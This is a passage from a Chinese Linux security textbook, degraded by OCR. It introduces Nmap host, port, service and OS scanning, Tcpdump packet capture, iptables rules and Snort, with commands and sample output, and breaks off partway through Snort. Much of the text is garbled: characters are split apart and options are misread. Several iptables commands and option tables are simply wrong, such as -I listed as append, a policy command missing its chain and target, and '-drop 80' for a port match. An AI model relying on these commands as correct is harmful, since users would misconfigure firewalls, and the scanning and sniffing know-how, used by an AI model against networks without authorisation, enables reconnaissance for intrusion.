首先 ,没有 哪个 程序 或 软件 能 够 做 到 保证 网 络 或 服务 器 永久 地 安全 ,安全 是 一 个 不 断 改 
进 、 评 估 、 再 改进 、 青 评估 的 循环 往复 的 过 程 。 在 Linux 平台 上 有 许 很 多 安全 工具 ,在 本 节 
中 ,主要 介绍 5 种 基于 Linux 下 的 安全 工具 ,并 给 出 这 几 种 工具 的 使 用 方法 ,这 些 工具 能 够 
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帮助 用 户 预防 ,检查 、 响 应 入 侵 行为 ,提高 Linux 系统 的 安全 性 。 
9.4.1 Nmap 工具 


为 了 评估 一 个 服务 器 或 网 络 是 否 容易 遭 守 攻击 ,必须 知道 有 多 少 服务 是 完全 暴露 给 攻 
击 者 的 ,Nmap 就 是 一 个 专门 嗅 探 和 扫描 主机 、 端 口 和 服务 的 工具 。Nmap 工具 可 以 运行 于 
Linux、FreeBSD UNIX 或 Windows 平台 ,是 一 个 网 络 扫描 和 嗅 探 工具 包 , 其 基本 功能 主要 
有 三 个 ,一 是 探测 一 组 主机 是 否 在 线 ; 其 次 是 扫描 主机 端口 , 嗅 探 所 提供 的 网 络 服务 ; 最 
后 ,还 可 以 推断 主机 所 用 的 操作 系统 。Nmap 可 用 于 扫描 小 到 仅 有 两 个 结 点 的 LAN ,大 到 
500 个 结 点 以 上 的 网 络 。Nmap 还 允许 用 户 定 制 扫描 技巧 。 

访问 http://nmap. org/download. html 可 以 下 载 最 新 版 本 的 Nmap 工具 。 

安装 Nmap 的 命令 是 : rpm -ivh nmap-5. 00-1. i386. rpm。 

下 面 介绍 Nmap 的 使 用 方法 。 

(1) Nmap 最 简单 的 用 法 就 是 在 本 地 的 网 络 上 探测 主机 ,在 这 个 实例 中 ,通过 使 用 
Nmap 发 送 ICMP echo 请 求 包 (ping) 到 某 段 IP 地 址 范围 内 的 所 有 主机 。 使 用 命令 nmap -sP 
219. 246. 5. 100 一 120 ,探测 219. 246. 5. 100 一 120 主机 的 信息 ,执行 情况 如 下 所 示 : 


#nmap - sP 219.246.5.100 一 120 

Starting Nmap 4.11 ( http://www. insecure. org/nmap/ ) at 2009 — 06 — 30 18:40 CST 
Host 219.246.5.102 appears to be up. 

MAC Address: 00:0D:87:B7:D3:40 (Elitegroup Computer System Co. (ECS) ) 
Host 219. 246. 5. 108 appears to be up. 

MAC Address: 00:15:F2:CB:AD:AA (Asustek Computer) 

Host 219. 246. 5.110 appears to be up. 

MAC Address: 00:16:96:0A:03:51 (QDI Technology (H.K. ) Limited) 

Host 219. 246. 5.116 appears to be up. 

MAC Address: 00:11:5B:6E:A2:75 (Elitegroup Computer System Co. (ECS)) 
Nmap finished: 21 IP addresses (4 hosts up) scanned in 6.218 seconds 


不 过 Nmap 最 常用 来 探测 哪个 服务 正在 运行 。 因 为 TCP 建立 一 个 连接 使 用 了 三 次 握 
手 ,我 们 可 以 检测 到 没有 产生 连接 但 又 被 打开 的 端口 ,这 就 是 著名 的 SYN 或 半 打 开 扫 描 ， 
当 用 root 登录 执行 时 ,这 种 检测 是 默认 的 模式 。 如 果 作为 一 个 正常 用 户 执行 时 ,Nmap 会 尝 
试 全 连接 来 测试 每 个 端口 ,检测 哪些 端口 是 开放 的 。 如 果 发 现 一 个 服务 器 正在 监听 某 个 不 
希望 监听 的 端口 , 须 进行 仔细 检查 。 

(2) 如 果 使 用 Nmap 检查 本 机 的 端口 情况 ,可 将 IP 替换 为 本 机 IP, 执 行情 况 如 下 : 


#nmap - SS 219.246.5.209 

Starting Nmap 4.11 ( http://www. insecure. org/nmap/ ) at 2009 ~ 06 ~ 30 18:43 CST 
Interesting ports on 219.246.5.209: 

Not shown: 1677 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios - ssn 

445/tcp open microsoft - ds 

MAC Rddress: 00:12:3F:CD:A4:CA (Dell) 

Nmap finished: 1 IP address (1 host up) scanned in 7.268 seconds 
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(3) 如 果 使 用 Nmap 命令 对 特定 的 服务 进行 标识 ,在 命令 后 加 上 -sV 选项 , 即 nmap -sV 
219. 246. 5. 209 ,执行 结果 如 下 : 


#nmap — sV 219.246.5.209 

Starting Nmap 4.11 ( http://www. insecure. org/nmap/ ) at 2009 — 06— 30 18:44 CST 
Interesting ports on 219. 246.5.209: 

Not shown: 1677 closed ports 

PORT STATE SERVICE VERSION 

135/tcp open msrpc Microsoft Windows RPC 

139/tcp open netbios - ssn 

445/tcp open microsoft - ds Microsoft Windows XP microsoft - ds 
MAC Rddress: 00:12:3F:CD:A4:CA (Dell) 

Service Info: 0S: Windows 

Nmap finished: 1 IP address (1 host up) scanned in 13.475 seconds 


(4) Nmap 命令 的 另外 一 个 用 法 是 操作 系统 的 探测 ,在 命令 后 加 上 参数 “-O” 即 可 ,如 果 
这 个 机 器 有 至 少 一 个 端口 打开 和 至 少 一 个 端口 关闭 ,就 可 以 准确 地 获取 操作 系统 的 信息 。 
使 用 命令 nmap -O -sS 219. 246. 5. 209 ,执行 结果 如 下 : 

# nmap -0 - sS 219.246.5.209 

Starting Nmap 4.11 ( http://www. insecure. org/nmap/ ) at 2009 - 06 — 30 18:47 CST 

Interesting ports on 219.246.5.209: 

Not shown: 1677 closed ports 

PORT STATE SERVICE 

135/tcp open msrpc 

139/tcp open netbios - ssn 

445/tcp open microsoft - ds 

MAC Address: 00:12:3F:CD:A4:CA (Dell) 

Device type: general purpose 

Running: Microsoft Windows 2003/. NET|NT/2K/xXP 

0S details: Microsoft Windows 2003 Server or XP SP2 

Nmap finished: 1 IP address (1 host up) scanned in 8.154 seconds 


还 可 以 使 用 Nmap 检查 网 络 上 的 所 有 机 器 ,看 是 否 存 在 有 临时 安装 的 但 又 未 删除 的 服 
务 , 另 外 ,该 命令 可 以 用 来 从 外 部 网 络 来 检查 防火 墙 配置 是 否 正确 。 


9.4.2 Tcpdump 工具 


Tcpdump 是 一 个 根据 使 用 者 的 定义 对 网 络 上 的 数据 包 进 行 截获 的 包 分 析 工 具 。 它 支 
持 针对 网 络 层 、 协 议 . 主 机、 网络 或 端口 的 过 滤 , 并 提供 and、or、not 等 逻辑 语句 来 帮助 去 除 
无 用 的 信息 ,得 到 需要 的 信息 。Tcpdump 提供 了 源 代码 ,公开 了 接口 ,因此 具备 很 强 的 可 扩 
展 性 ,对 于 网 络 维护 和 入 侵 者 都 是 非常 有 用 的 工具 。Tcpdump 存在 于 基本 的 FreeBSD 系 
统 中 ,由 于 它 需 要 将 网 络 界面 设置 为 混杂 模式 ,普通 用 户 不 能 正常 执行 ,但 具备 root 权限 的 
用 户 可 以 直接 执行 它 来 获取 网 络 上 的 信息 。 因 此 系统 中 存在 网 络 分 析 工 具 主 要 不 是 对 本 机 
安全 的 威胁 ,而 是 对 网 络 上 的 其 他 计算 机 的 安全 存在 威胁 。 

Tcpdump 工具 在 Red Hat Enterprise Linux 5 中 默认 安装 ,在 介绍 Tcpdump 工具 的 使 
用 之 前 ,首先 介绍 网 卡 的 几 种 工作 模式 。 
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。 广播 模式 (Broadcast Model) : 物理 地 址 (MAC) 是 OXffffff 的 帧 为 广播 帧 ,工作 在 广 
播 模式 的 网 卡 接收 广播 帧 。 
。 多 播 传送 (Multicast Model) : 多 播 传 送 地 址 作为 目的 物理 地 址 的 帧 可 以 被 组 内 的 
其 他 主机 同时 接收 ,而 组 外 主机 却 接收 不 到 。 但 是 ,如 果 将 网 卡 设 置 为 多 播 传 送 模 
式 , 它 可 以 接收 所 有 的 多 播 传送 帧 ,而 不 论 它 是 不 是 组 内 成 员 。 
。 直接 模式 (Direct Model) : 工作 在 直接 模式 下 的 网 卡 只 接收 目的 地 址 是 自己 MAC 
地 址 的 帧 。 
。 混杂 模式 (Promiscuous Model) : 工作 在 混杂 模式 下 的 网 卡 接收 所 有 流 过 网 卡 的 帧 ， 
信息 包 捕 获 程 序 就 是 在 这 种 模式 下 运行 的 。 
网 卡 的 默认 工作 模式 包含 广播 模式 和 直接 模式 , 即 它 只 接收 广播 帧 和 发 给 自己 的 帧 。 
如 果 采 用 混杂 模式 ,一 个 站 点 的 网 卡 将 接收 同一 网 络 内 所 有 站 点 所 发 送 的 数据 包 , 这 样 就 可 
以 对 网 络 信息 进行 监视 和 捕获 。 一 般 情况 下 ,网络 硬 件 和 TCP/IP 堆栈 不 支持 接收 或 发 送 
与 本 计算 机 无 关 的 数据 包 , 为 了 接收 这 些 数据 包 , 就 必须 使 用 网 卡 的 混杂 模式 ,并 绕 过 标准 
的 TCP/IP 堆栈 才 行 。 
下 面 介 绍 Tcpdump 命令 的 使 用 。 
(1) Tcpdump 是 检查 网 络 通信 原始 数据 包 最 基本 的 应 用 程序 ,系统 默认 安装 该 程序 。 
使 用 命令 tcpdump --help 可 以 获得 帮助 ,执行 帮助 命令 后 结果 如 下 : 


# tcpdump - help 
tcpdump version 3.9.4 
libpcap version 0.9.4 
Usage: tcpdump [ - aAdDeflLnNOpqRStuUvxX] [ - c count] [ -C file size ] 
[ ~Ealgo:secret ] [ ~F file ] [ -iinterface ] [ -Msecret ] 
[ -rfile][ -ssnaplen ][ -Ttype ][ -wfile] 
[ -Wfilecount ] [ ~y datalinktype ] [ ~ Z user ] 
[ expression ] 


(2) 使 用 Tcpdump 抓获 来 自 源 端口 80 或 目标 端口 80 的 所 有 数据 报 , 此 时 可 以 使 用 -n 
参数 。 如 果 捕 获 的 信息 更 详细 ,可 以 设置 源 端口 和 目的 端口 号 ,如 src port 80 或 者 dst port 
80, 即 使 用 命令 tcpdump -n 'port 80', 该 命令 执行 后 结果 如 下 : 


# tcpdump —n 'port 80° 

tcpdump: WARNING: peth0: no IPv4 address assigned 

tcpdump: verbose output suppressed, use —v or -vv for full protocol decode 

listening on peth0, link— type EN10MB (Ethernet), capture size 96 bytes 

18:45:54.880542 IP 219.246.5.67.1lsurfup— http > 221.7.40.221.http: S 
3834550388:3834550388(0) win 65535 <mss 1460, nop, wscale 0, nop, nop, timestamp 0 

0, nop, nop, sackOK > 

18:45:54.883614 IP 219.246.5.67.accelenet > 221.7.40.221.http: S 555054205:555054205(0) 
win 65535 < mss 1460, nop, wscale 0,nop,nop,timestamp 0 0, nop, nop, sackOK > 

18:45:55.483201 IP 221.194.142.207.http > 219.246.5.67.8090: UDP, length 56 
18:45:57.845283 IP 219.246.5.67.1l1surfup -~ http > 221.7.40.221.http: S 
3834550388:3834550388(0) win 65535 <mss 1460, nop, wscale 0, nop, nop, timestamp 0 

0, nop, nop, sackOK > 

18:45:57.845285 IP 219.246.5.67.accelenet > 221.7.40.221.http: S 555054205:555054205(0) 
win 65535 <mss 1460, nop, wscale 0, nop, nop, timestamp 0 0, nop, nop, sackOK > 
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18:45:59.081539 IP 219.246.5.67.8090 > 221.194.142.207.http: UDP, length 28 
18:45:59.171784 IP 221.194.142.207.http > 219.246.5.67.8090: UDP, length 12 
18:46:03.856001 IP 219.246.5.67.1l1surfup - http > 221.7.40.221.http: S 
3834550388:3834550388(0) win 65535 <mss 1460, nop, wscale 0, nop, nop, timestamp 0 

0,nop, nop, sackOK > 

18:46:03.856002 IP 219.246.5.67.accelenet > 221.7.40.221.http: S 555054205:555054205(0) 
win 65535 <mss 1460, nop, wscale 0, nop, nop, timestamp 0 0, nop, nop, sackOK > 


(3) 使 用 Tcpdump 进行 抓 包 , 使 用 命令 tcpdump -w /tcpdumpfile 执行 结果 如 下 : 


#tcpdump - w /tcpdumpfile 
tcpdump: WARNING: peth0: no IPv4 address assigned 
tcpdump: listening on peth0, link— type EN10MB (Ethernet), capture size 96 bytes 


使 用 命令 tcpdump -r /tcpdumpfile 读 取 数 据 包 ,执行 结果 如 下 : 


# tcpdump —r /tcpdumpfile 

reading from file /tcpdumpfile, link— type EN10MB (Ethernet) 

18:50:44.220141 802.1d config 8000.00:d0:f8:fd:63:1a. 8005 root 8000.00:03:42:f0:22:61 
pathcost 37 age 3 max 20 hello 2 fdelay 15 

18:50:44.301271 arp who - has 192.168.1.3 tell 192.168.1.27 

18:50:44.348888 arp who - has 219.246.5.35 tell 219.246.5.254 

18:50:44.664797 IP 219.246.5.230.ddi- udp— 2> 224.0.0.88. irdmi: UDP, length 53 
18:50:45.651411 IP6 fe80::d544:145c:f37c:885d > ff02: :1:ffee:4211: ICMP6, neighbor 
solicitation, who has fe80::74f1:d12:b0ee:4211, length 32 

18:50:46.047962 IP 219.246.5.67.netbios - dgm > 219.246.5.255.netbios - dgm: NBT UDP 
PACKET( 138) 

18:50:46.219520 802. 1d config 8000.00:d0:f8:fd:63:1a.8005 root 8000.00:03:42:f0:22:61 
pathcost 37 age 3 max 20 hello 2 fdelay 15 

18:50:46.606790 IP6 fe80::d544:145c:f37c:885d > ff02: :1:ffee:4211: ICMP6, neighbor 
solicitation, who has fe80::74f1:d12:b0ee:4211, length 32 

18:50:47.333929 arp who - has 192.168.1.2 tell 192.168.1.27 

18:50:47.636059 IP6 fe80::d544:145c:f37c:885d > ff02: :1:ffee:4211: ICMP6, neighbor 
solicitation, who has fe80::74f1:d12:b0ee:4211, length 32 

18:50:47.750573 IP 219.246.5.3.1004 > 255.255.255.255.1004: UDP, length 48 
18:50:48.218055 802. 1d config 8000.00:d0:f8:fd:63:1a.8005 root 8000.00:03:42:f0:22:61 
pathcost 37 age 3 max 20 hello 2 fdelay 15 

18:50:48.330867 arp who - has 192.168.1.3 tell 192.168.1.27 

18:50:48.397966 arp who - has 219.246.5.35 tell 219.246.5.254 

18:50:48.419947 IP 219.246.5.112.netbios - dgm > 219.246.5.255.netbios - dgm: NBT UDP 
PACKET( 138) 

18:50:48.426034 IPX 00000000.00:1c:25:0e:a0:4d.0455 > 00000000. ff:ff:ff:ff:ff:ff.0455: 
ipx— netbios 50 


(4) 只 显示 通过 eth0 网 卡 的 数据 包 , 使 用 命令 tcpdump -i eth0 ,执行 结果 如 下 : 


#tcpdump — i eth0 

tcpdump: verbose output suppressed, use —v or — vv for full protocol decode 
listening on eth0, link~ type EN10MB (Ethernet), capture size 96 bytes 
10:52:57.773976 IP 219.246.5.198.netbios -ns > 219.246.5.255.netbios - ns: NBT UDP 
RCKET(137) : QUERY; REQUEST; BROADCAST 

10:52:58.036180 IP 219.246.5.198.netbios— ns > 219.246.5.255.netbios -ns: NBT UDP 
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PACKET(137): QUERY; REQUEST; BROADCAST 

10:52:57.806524 IP 219.246.5.231.filenet ~- cm > dns. 1zjtu. cn. domain: 543+ PTR? 
255.5.246.219. in— addr.arpa. (44) 

10:52:57.918196 IP dns. 1zjtu. cn. domain > 219.246.5.231. filenet ~ cm: 543 NXDomain 0/1/0 
(105) 

10:52:57.920915 IP 219.246.5.231.filenet ~ cm> dns. lzjtu.cn.domain: 10257 + PTR? 
198.5.246.219. in— addr.arpa. (44) 

10:52:58. 035270 IP dns. lzjtu. cn. domain > 219.246.5.231.filenet ~- cm: 10257 NXDomain 
0/1/0 (105) 

10:52:58.037312 IP 219.246.5.231.filenet ~ cm> dns.1zjtu. cn. domain: 23180 + PTR? 
200.40.7.221. in— addr.arpa. (43) 

10:52:58. 038443 IP dns. lzjtu. cn. domain > 219.246.5.231.filenet ~- cm: 23180* 1/1/1 (99) 
10:52:58.039267 IP 219.246.5.231.filenet ~ cm> dns. lzjtu.cn.domain: 5156 + PTR? 
231.5.246.219. in— addr.arpa. (44) 

10:52:58.040276 IP dns. 1zjtu. cn. domain > 219.246.5.231.filenet ~- cm: 5156 NXDomain 
0/1/0 (105) 

10:52:58.523390 IP 219.246.5.198.netbios— ns > 219.246.5.255.netbios ~ ns: NBT UDP 
PACKET(137): QUERY; REQUEST; BROADCAST 

10:52:59.273202 IP 219.246.5.198.netbios— ns > 219.246.5.255.netbios ~ ns: NBT UDP 
PACKET(137): QUERY; REQUEST; BROADCAST 

10:53:00.023317 IP 219.246.5.198.netbios - ns > 219.246.5.255.netbios - ns: NBT UDP 
PRCKET(137) : QUERY; REQUEST; BRORDCRST 

10:53:00.083543 IP 219.246.5.254 > OSPF - ALL. MCAST. NET: OSPFv2, Hello, length: 44 
10:53:00.085282 IP 219.246.5.231.filenet ~ cm> dns. lzjtu.cn.domain: 6272 + PTR? 
5.0.0.224. in- addr.arpa. (40) 

10:53:00.607258 IP dns. lzjtu. cn. domain > 219.246.5.231. filenet - cm: 6272 1/3/3 
PTR[ | domain] 

10:53:00.608052 IP 219.246.5.231.filenet ~ cm> dns.1zjtu. cn. domain: 17013+ PTR? 
254.5.246.219. in— addr. arpa. (44) 

10:53:00.719397 IP dns. lzjtu. cn. domain > 219.246.5.231. filenet ~ cm: 17013 NXDomain 
0/1/0 (105) 


(5) 过 滤 源 主机 IP 地 址 为 219. 246. 5. 231 与 目的 网 络 为 219. 246. 5. 0 之 间 数 据 传输 
的 报头 ,命令 格式 为 : tcpdump -w /tcpdumpfile src host 219. 246. 5. 231 and dst net 
219. 246. 5.0/24。 执 行 后 将 数据 写 入 / tcpdumpfile, 执 行 该 命令 后 结果 如 下 : 

#tcpdump —w /123 src host 219.246.5.231 and dst net 219.246.5.0/24 

tcpdump: WARNING: peth0: no IPv4 address assigned 

tcpdump: listening on peth0, link— type EN10MB (Ethernet), capture size 96 bytes 

#tcpdump —r /123 

reading from file /123, link— type EN10MB (Ethernet) 

11:01:28.500087 arp reply 219.246.5.231 is—at 00:0c:29:53:40:d6 (oui Unknown) 

11:01:28.604709 arp reply 219.246.5.231 is—at 00:0c:29:53:40:d6 (oui Unknown) 

11:01:28.713723 arp reply 219.246.5.231 is-at 00:0c:29:53:40:d6 (oui Unknown) 

通过 上 面 的 例子 可 以 了 解 Tcpdump 的 使 用 方法 ,下 面 对 一 些 附加 选项 进行 说 明 。 

src、dst、port、host、net、ether、gateway 这 几 个 选项 用 来 分 辨 数据 包 的 来 源 和 去 向 ,host 
是 与 其 指定 主机 相关 的 参数 ,无 论 是 源 主机 或 是 目的 主机 ,net 是 与 其 指定 网 络 相 关 的 参 
数 ,ether 参数 后 级 的 是 物理 地 址 ,而 gateway 则 用 于 网 关 主 机 。 

通过 下 面 的 实例 可 以 说 明 这 些 参 数 的 使 用 方法 。 
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(6) tcpdump ether src 00:50:04:BA:9B and dst… 

该 命令 用 于 过 滤 源 主机 物理 地 址 为 XXX 的 报头 (由 于 物理 地 址 没有 网 络 ,所 以 ether 
src 后 面 没有 host 或 者 net) 。 

(7) tcpdump src host 219. 246. 5. 231 and dst port not telnet 

该 命令 用 于 过 滤 源 主机 219. 246. 5. 231 和 目的 端口 不 是 telnet 的 报头 。 

(8) ip iemp arp rarp 和 tcp udp \icmp 等 这 些 选项 等 都 应 放 在 第 一 个 参数 的 位 置 ,用 来 
过 滤 数 据 报 的 类 型 。 

例如 : 


tcpdump arp src … 
tcpdump tcp and src host 219.246.5.231 


该 命令 用 于 只 过 滤 源 主机 219. 246. 5. 231 的 所 有 tcp 报头 。 
9.4.3 iptables 工具 


iptables 是 一 款 状态 防火 墙 工 具 ,并 已 集成 到 所 有 Linux 发 行 版 本 中 ,这 样 就 可 以 使 用 
基于 IP 地 址 的 规则 来 控制 远程 机 器 访问 本 地 的 服务 器 以 及 连接 请 求 的 类 型 。 该 防火 墙 不 
仅 提 供 了 强大 的 数据 包 过 滤 能 力 ,而且 还 提供 转发 .NAT 映射 等 功能 。 该 包 过 滤 防 火 墙 是 
免费 的 ,官方 网 站 http://www. netfilter. org 提供 了 iptables 软件 的 最 新 版 本 。 

1. iptables 工具 介绍 

在 使 用 iptables 之 前 ,首先 必须 理解 规则 、 链 和 表 这 三 个 概念 。 

1) 规则 

规则 (rules) 其 实 就 是 管理 员 预 定义 的 条 件 ,规则 的 一 般 定 义 为 “如 果 数 据 包 符 合 这 样 
的 条 件 ,就 处 理 这 个 数据 包 ”。 规 则 存储 在 内 核 空 间 的 信息 包 过 滤 表 中 ,这 些 规则 分 别 指定 
了 源 地 址 .目的 地 址 、 传 输 协 议和 服务 类 型 等 ,数据 包 与 规则 匹配 时 ,iptables 就 根据 规则 所 
定义 的 方法 来 处 理 这 些 数 据 包 。 

2) 链 

链 (chains) 是 数据 包 传播 的 途径 ,每 一 条 链 实 质 上 就 是 规则 中 的 一 个 检查 清单 ,每 一 条 
链 中 可 以 有 一 条 至 多 条 规则 。 当 一 个 数据 包 到 达 一 个 链 时 ,iptables 就 会 从 链 中 的 第 一 条 
规则 开始 检查 ,判断 该 数据 包 是 否 满足 规则 所 定义 的 条 件 , 如 果 满 足 , 系 统 就 会 根据 该 规则 
所 定义 的 方法 处 理 该 数据 包 ; 否则 检查 下 一 条 规则 , 如果 不符 合 链 中 的 任意 一 条 规则 ， 
iptables 就 会 根据 链 预 先 定义 的 默认 策略 来 处 理 数据 包 。 

3) 表 

表 (tables) 内 置 了 三 个 表 , 即 filter 表 、nat 表 和 mangle 表 , 分 别 用 于 实现 包 过 滤 、 网 络 
地 址 转换 和 包 重 构 功 能 ,下 面 分 别 进行 介绍 。 

(1) filter 表 

filter 表 主 要 用 于 过 滤 数据 包 , 该 表 根 据 管理 员 预 定义 的 规则 过 滤 符 合 条 件 的 数据 包 。 
对 于 防火 墙 而 言 ,主要 利用 在 filter 表 中 制订 的 一 系列 规则 以 实现 对 数据 包 进 行 过 滤 的 操 
作 。filter 表 是 iptables 默认 的 表 , 如 果 没 有 指定 使 用 哪 一 个 表 ,iptables 默认 使 用 该 表 来 执 
行 所 有 的 命令 。filter 表 包 含 以 下 几 个 链 。 
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。 INPUT 链 : 处 理 进 入 的 数据 包 。 

。 FORWORD 链 : 处 理 转发 的 数据 包 。 

。 OUTPUT 链 : 处 理 本 地 生成 的 数据 包 。 

在 该 表 中 只 允许 对 数据 包 进 行 接收 和 丢弃 的 操作 ,无 法 对 数据 包 进 行 更 改 。 

(2) nat 表 

nat 表 主 要 用 于 网 络 地 址 转换 NAT, 该 表 可 以 实现 一 对 一 、 一 对 多 、 多 对 多 等 NAT 工 
作 ,iptables 就 是 使 用 该 表 实 现 网 上 共享 功能 ,该 表 包 含 以 下 三 个 链 。 

。 PREROUTING 链 : 修改 即将 到 来 的 数据 包 。 

。 OUTPUT 链 : 修改 在 路 由 之 前 本 地 生成 的 数据 包 。 

。 POSTROUTING 链 : 修改 即将 出 去 的 数据 包 。 

(3) mangle 表 

mangle 表 在 Linux2. 4. 18 的 内 核 之 前 只 包含 下 面 几 个 链 。 

。 PREROUTING 链 : 修改 在 路 由 之 前 进入 的 数据 包 。 

。 OUTPUT 链 : 修改 在 路 由 之 前 本 地 生成 的 数据 包 。 

在 Linux2. 4. 18 的 内 核 之 后 增加 了 以 下 几 个 链 。 

。 INPUT 链 : 处 理 进 入 的 数据 包 。 

。 FORWORD 链 : 处 理 转发 的 数据 包 。 

。 POSTROUTING 链 : 修改 即将 出 去 的 数据 包 。 

2. iptables 命令 格式 

iptables 的 命令 格式 较为 复杂 ,一 般 格式 如 下 : 

iptables [-t 表 ] -命令 匹配 动作 


下 面 对 各 选项 进行 简要 说 明 。 

1) 表 选 项 

表 选 项 用 于 指定 命令 应 用 于 哪个 iptables 内 置 表 , 包 括 filter 表 、nat 表 和 mangle 表 。 
2) 命令 选项 

命令 选项 用 于 指定 iptables 的 执行 方式 ,包括 插入 \ 删 除 和 添加 规则 ,如 表 9-3 所 示 。 


表 9-3 命令 选项 

命 令 说 明 
-P 或 -policy 过 链 名 二 定义 默认 策略 
-或 --list 二 链 名 二 查看 iptables 规则 列表 
-I 或 -append 二 链 名 二 在 规则 列表 的 最 后 插入 一 条 规则 
-P 或 --insert 二 链 名 二 在 指定 的 位 置 插入 一 条 规则 
-D 或 -delete 到 链 名 过 从 规则 列表 中 删除 一 条 规则 
-R 或 -replace 所 链 名 过 替换 规则 列表 中 的 某 条 规则 
-FF 或 -flush 二 链 名 二 删除 列表 中 的 所 有 规则 
-Z 或 -zero 一 链 名 二 将 表 中 数据 包 计数 器 和 流量 计数 器 归 零 


3) 匹配 项 
匹配 选项 指定 数据 包 与 规则 匹配 所 应 具有 的 特征 ,包括 源 地 址 .目的 地 址 、 传 输 协 议和 
端口 号 ,如 表 9-4 所 示 。 
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表 9-4 匹配 选项 

匹 配 说 明 
二 i 或 -in-interface 二 网 络 接口 名 二 指定 数据 包 从 哪个 网 络 接口 进入 
-0 或 -out-interface 二 网 络 接口 名 二 指定 数据 包 从 哪个 网 络 接口 输出 
-p 或 -proto 一 协议 类 型 二 指定 数据 包 匹 配 的 协议 
-s 或 -source 一 源 地 址 或 子 网 二 指定 数据 包 匹 配 的 源 地 址 
一 sport 二 源 端 口号 二 指定 数据 包 匹 配 的 源 端口 
-d 或 -destination 一 目标 地 址 或 子 网 二 指定 数据 包 匹 配 的 目标 地 址 
一 dport 所 目标 端口 号 > 指定 数据 包 匹配 的 目标 端口 号 


4) 动作 选项 
动作 选项 指定 当 数 据 包 与 规则 匹配 时 ,应 该 做 什么 操作 ,如 接受 、 丢 弃 等 ,如 表 9-5 
所 示 。 


表 9-5 动作 选项 
动 作 说 有明 
ACCEPT 接收 数据 包 
DROP 丢弃 数据 包 
REDIRECT 将 数据 包 转 向 到 本 机 或 另 一 台 主 机 的 某 个 端口 ,通常 用 功能 实现 透 
明代 理 或 对 外 开放 内 网 某 些 服务 
SNAT 源 地 址 转换 , 即 改变 数据 包 的 源 地 址 
DNAT 目标 地 址 转换 , 即 改变 数据 包 的 目标 地 址 
MASQUERADE IP 伪装 , 即 常 说 的 NAT 技术 
LOG 日 志 功能 ,将 符合 规则 的 数据 包 记 录 在 日 志 中 


3. iptables 的 使 用 方法 

iptables 的 使 用 方法 主要 包括 以 下 几 个 方面 。 

1) 定义 默认 策略 

@ 将 filter 表 INPUT 链 的 默认 策略 定义 为 接收 数据 包 : 
iptables —P INPUT ACCEPT 

@ 将 nat 表 OUTPUT 链 的 默认 策略 定义 为 丢弃 数据 包 : 
iptables —t NAT ACCEPT 

@ 查看 nat 表 所 有 链 的 规则 列表 : 

iptables ~tnat -LL 

2) 增加 \ 插 入 、 删 除 和 替换 规则 


g@ 为 flter 表 的 INPUT 添加 一 条 规则 ,规则 的 内 容 是 将 来 自 IP 地址 为 219. 246. 5. 122 这 
台 主 机 的 数据 包 都 予以 丢弃 ,然后 可 以 使 用 命令 查看 : 


iptables -tfilter ~ A INPUT ~ s 219.246.2.122 - j DROP 
iptables -七 filter —L INPUT 
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@ 为 flter 表 的 INPUT 添加 一 条 规则 ,规则 的 内 容 是 将 来 自卫 地 址 为 219. 246. 5. 122 这 
台 主 机 的 数据 包 都 予以 接收 ,然后 可 以 使 用 命令 查看 : 

iptables —t filter — A INPUT — s 219.246.2.122 —j ACCEPT 

iptables —t filter —L INPUT 

@ 在 filter 表 的 INPUT 链 规则 列表 中 的 第 二 条 规则 前 插入 一 条 规则 ,规则 的 内 容 是 
禁止 219. 246. 5. 0 这 个 子 网 里 的 所 有 主机 访问 TCP 80 端口 ,然后 使 用 命令 查看 : 


iptables —t filter -IINPUT 2 —s 219.246.5.0/24 -ptcp - drop 80 - j DROP 
iptables -七 filter -LINPUT 


@ 删除 filter 表 的 INPUT 链 规则 列表 中 的 第 三 条 规则 ,然后 使 用 命令 查看 : 


iptables —t filter —-D INPUT 3 

iptables —t filter -EL INPUT 

@ 替换 filter 表 的 INPUT 链 规则 列表 中 的 第 二 条 规则 ,禁止 219. 246. 4. 0 这 个 子 网 里 
的 所 有 主机 访问 TCP80 端口 ,然后 使 用 命令 查看 : 


iptables -tfilter -RINPUT 2 -s 219.246.4.0/24 -p tcp - drop 80 - j DROP 
iptables -+tfilter -LINPUT 


@ 删除 filter 表 中 的 所 有 规则 : 

iptables —F 

@ 将 filter 表 中 的 数据 包 计数 器 和 流量 计数 器 清 零 : 
iptables -z 

@ 删除 nat 表 中 的 所 有 规则 : 


iptables 一 七 nat 一 了 
9.4.4 Snort 工具 


1. Snort 工具 介绍 

Snort 是 一 个 免费 的 、 跨 平台 的 软件 包 , 是 一 个 轻便 的 网 络 入 侵 检 测 系统 ,具有 实时 流 
量 分 析 和 对 网 络 上 的 IP 包 进行 测试 等 功能 ,能 完成 协议 分 析 、 内 容 查 找 /匹配 ,能 用 来 探测 
多 种 攻击 和 嗅 探 (如 缓冲 区 溢出 、 秘 密 端 口 扫描 、CGI 攻击 SMB 嗅 探 、 拇 纹 采 集 尝 试 等 )。 
该 工具 可 以 运行 在 Linux/UNIX 和 Win32 系统 上 ,其 安装 也 比较 容易 。 

Snort 主要 有 如 下 功能 。 

(1) 实时 通信 分 析 和 信息 包 记 录 。 

(2) 包 中 有 效 载荷 的 检查 。 

(3) 协议 分 析 和 内 容 查询 匹配 。 

(4) 探测 缓冲 溢出 ,秘密 端口 扫描 、CGI 攻击 .SMB 探测 ,操作 系统 侵入 尝试 。 

(5) 对 系统 日 志 、 指 定 文件 .UNIX Socket 或 通过 Samba 的 WinPopup 进行 实时 报警 。 

Snort 的 下 载 地 址 为 http://www. snort. org/ ,官方 网 站 为 用 户 提供 两 种 包 , 它 们 分 别 
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是 nort-2. 8. 4.1. tar. gz 和 nort-2. 8. 4-1. RH5. i386. rpm, 这 两 种 包 的 安装 方法 这 里 不 再 介绍 。 
为 了 安全 还 应 该 安装 下 列 软 件 包 : libcap、MySQL、Apache、OpenSSL 和 Snort rules。 
OpenSSL 的 下 载 地 址 是 http://www. openssl. org/ source。 

Snort rules 的 下 载 地 址 是 http://www. snort. org/dl/rules。 

其 余 三 个 为 系统 自 带 软件 ,可 自行 安装 。 

上 述 软件 安装 完成 后 ,执行 命令 snort -dvi eth0 进行 安装 验证 ,其 中 : 
参数 d 表示 对 资料 进行 解码 。 

参数 v 表示 将 结果 显示 在 屏幕 上 。 

参数 i 指定 所 需 的 接口 。 

执行 以 后 结果 如 下 : 


# snort -dvi eth0 
Running in packet dump mode 
--== Initializing Snort ==-— 
Initializing Output Plugins! 
Verifying Preprocessor Configurations! 
Initializing Network Interface eth0 
